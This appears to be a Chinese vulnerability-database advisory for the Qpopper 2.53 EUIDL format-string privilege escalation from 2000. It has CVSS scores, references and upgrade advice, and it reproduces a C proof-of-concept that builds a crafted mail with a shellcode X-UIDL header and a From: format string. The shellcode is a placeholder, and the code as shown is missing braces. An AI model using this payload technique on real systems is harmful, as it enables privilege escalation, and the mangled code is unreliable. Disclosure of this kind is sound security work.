发布时间 :2000-05-24 00:00:00
修订时间 :2008-09-10 15:04:41

[原文]Qpopper 2.53 and earlier allows local users to gain privileges via a formatting string in the From: header, which is processed by the euidl command.

[CNNVD]Qualcomm Qpopper 'EUIDL'格式字符串输入漏洞(CNNVD-200005-084)

        Qpopper 2.53和更早的版本存在漏洞。本地用户借助格式化字符串:euidl命令处理的header可以提升特权。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:sun:cobalt_raq_3iSun Cobalt RaQ 3.0
cpe:/h:sun:cobalt_raq_2Sun Cobalt RaQ 2.0

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  1242
(UNKNOWN)  SUSE  20000608 pop <= 2000.3.4
(UNKNOWN)  BUGTRAQ  20000523 Qpopper 2.53 remote problem, user can gain gid=mail

- 漏洞信息

Qualcomm Qpopper 'EUIDL'格式字符串输入漏洞
高危 输入验证
2000-05-24 00:00:00 2006-08-28 00:00:00
        Qpopper 2.53和更早的版本存在漏洞。本地用户借助格式化字符串:euidl命令处理的header可以提升特权。

- 公告与补丁

        Upgrading to versions 3.0.1 or later of qpopper is recommended by the vendor.
        Qualcomm qpopper 2.52
        Qualcomm qpopper 2.53

- 漏洞信息 (19955)

Cobalt RaQ 2.0/3.0,qpopper 2.52/2.53 'EUIDL' Format String Input Vulnerability (EDBID:19955)
linux local
2000-05-24 Verified
0 Prizm
N/A [点击下载]

A vulnerability exists in version 2.53 and prior of qpopper, a popular POP server, from Qualcomm. By placing machine executable code in the X-UIDL header field, supplying formatting strings in the "From:" field in a mail header, and then issuing, as the user the mail was sent to, a 'euidl' command, it is possible to execute arbitrary code. This code will execute as the user executing the euidl command, but with group 'mail' permissions on hosts running qpopper in that group. This is often done due to mail spool permissions.

This vulnerability does not exist in versions after 2.53. It also requires an account on the machine.

/*  qpop_euidl.c exploit by prizm/Buffer0verflow Security 
 *  Sample exploit for buffer overflow in Qpopper 2.53.
 *  This little proggie generates a mail u need to send.
 *  Standard disclaimer applies.     
 *  By the way, exploit is broken =) You need to insert shellcode.
 *  MAD greets to tf8 for pointing out the bug, and all other b0f members.
 *  greets to USSRLabs and ADM
 *  check for news.
#include <stdio.h>
#include <string.h>
char shellcode[]="imnothing";
int main(int argc, char *argv[])
        int i;  
        unsigned long ra=0;
        if(argc!=2) {
                fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
        sscanf(argv[1], "%x", &ra);
        if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
                fprintf(stderr,"Bad shellcode\n");
        fprintf(stderr,"return address: 0x%.8x\n", ra);
        printf("X-UIDL: ");
        for(i=0; i < sizeof(shellcode);i++)
                printf("%c", shellcode[i]);
        printf("From: %s", "%.1000d");    
        for(i=0; i < 50; i++)
                printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24);
        printf("Subject: test\r\n\r\nhuh?\r\n.\r\n"); 
        return 0;

- 漏洞信息

Qpopper From: Header Format String Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-05-22 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete